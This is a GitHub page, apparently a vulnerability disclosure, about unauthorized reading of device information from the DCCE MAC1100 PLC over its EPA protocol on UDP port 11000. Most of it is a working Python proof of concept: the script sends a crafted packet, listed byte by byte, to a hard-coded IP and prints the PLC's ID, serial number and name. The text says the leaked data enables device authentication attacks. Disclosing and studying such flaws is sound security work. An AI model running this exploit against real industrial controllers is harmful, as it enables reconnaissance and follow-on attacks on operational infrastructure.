Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Dut Computer Control Engineering Co., Ltd

Edition :

(Dut Computer Control Engineering Co., Ltd ) DCCE MAC1100 PLC

Location

abnormal data: \x0c\x00\x78\xa5\x10\x00\x01\x00\x00\x00\x15\x27\x00\x00\x00\x00

Harm

Sensitive Information Disclosure Vulnerability

Cause the cause

The MAC1100 PLC communicates on the 11000 port using the EPA protocol. The attacker can read the specific storage area by unauthorized EPA read operation, collect relevant device information in the PLC, and can be used for PLC device authentication attacks.

Run python script,we can find some infomation

enter description here

poc

#!/usr/bin/python
# -*- coding:utf-8 -*-
import socket


def info_leak(magic_message):
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:
        sender.sendto(magic_message,("192.168.1.181",11000))
        request = sender.recvfrom(1024)
        PLC_ID = (request[0][9:41])
        PLC_series = (request[0][26:41])
        PLC_name = (request[0][41:71])
        print('-------------------Divice Information--------------------')
        print('PLC_ID         =       %s '% PLC_ID)
        print('Series Number  =       %s '% PLC_series)
        print('PLC_name       =       %s '% PLC_name)


    except:
        pass

packet = "\x0c\x00\x78\xa5\x10\x00\x01\x00\x00\x00\x15\x27\x00\x00\x00\x00"
info_leak(packet)